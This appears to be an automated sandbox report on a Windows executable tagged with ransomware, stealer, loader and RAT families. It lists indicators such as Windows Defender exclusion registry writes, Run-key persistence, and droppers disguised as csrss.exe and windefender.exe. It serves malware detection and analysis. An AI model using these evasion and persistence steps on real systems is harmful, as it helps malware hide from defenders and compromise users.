Malware Analysis Report

2024-11-13 14:05

Sample ID 240225-2pwwdafb4x
Target 0b31dc8d9eeaa4a6803873a6c1380c72.exe
SHA256 7c94ffaf6d76f18ce6bfc6039f9252a4b71d79e483d822aeab0de9b3189b6d0e
Tags
dcrat djvu glupteba smokeloader vidar zgrat 7f6c51bbce50f99b5a632c204a5ec558 tfd5 backdoor discovery dropper evasion infostealer loader persistence ransomware rat rootkit stealer trojan upx lumma rhadamanthys
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7c94ffaf6d76f18ce6bfc6039f9252a4b71d79e483d822aeab0de9b3189b6d0e

Threat Level: Known bad

The file 0b31dc8d9eeaa4a6803873a6c1380c72.exe was found to be: Known bad.

Malicious Activity Summary

dcrat djvu glupteba smokeloader vidar zgrat 7f6c51bbce50f99b5a632c204a5ec558 tfd5 backdoor discovery dropper evasion infostealer loader persistence ransomware rat rootkit stealer trojan upx lumma rhadamanthys

Glupteba

Detect Vidar Stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

DcRat

Detected Djvu ransomware

Rhadamanthys

Detect ZGRat V1

Djvu Ransomware

Glupteba payload

Vidar

Lumma Stealer

Windows security bypass

ZGRat

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Modifies Windows Firewall

Disables Task Manager via registry modification

Downloads MZ/PE file

Possible attempt to disable PatchGuard

UPX packed file

Executes dropped EXE

Modifies file permissions

Checks computer location settings

Loads dropped DLL

Windows security modification

Deletes itself

Manipulates WinMonFS driver.

Checks installed software on the system

Looks up external IP address via web service

Manipulates WinMon driver.

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Uses Task Scheduler COM API

Modifies registry key

Creates scheduled task(s)

Checks SCSI registry key(s)

Modifies system certificate store

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-25 22:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-25 22:45

Reported

2024-02-25 22:48

Platform

win7-20240215-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1cf4e57f-32c3-4019-88f0-dbc6891395db\\84BB.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C851.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

ZGRat

rat zgrat

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B8D6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DE51.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EDE2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2F75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\34C3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\containerProviderhost\runtimenetSvc.exe N/A
N/A N/A C:\containerProviderhost\services.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C851.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1cf4e57f-32c3-4019-88f0-dbc6891395db\\84BB.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\84BB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\C851.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\dwm.exe C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files (x86)\Windows Defender\de-DE\6cb0b6c459d5d3 C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files (x86)\Windows Defender\de-DE\dwm.exe C:\containerProviderhost\runtimenetSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240225224649.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Speech\Common\en-US\cmd.exe C:\containerProviderhost\runtimenetSvc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\C851.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" C:\Windows\windefender.exe N/A
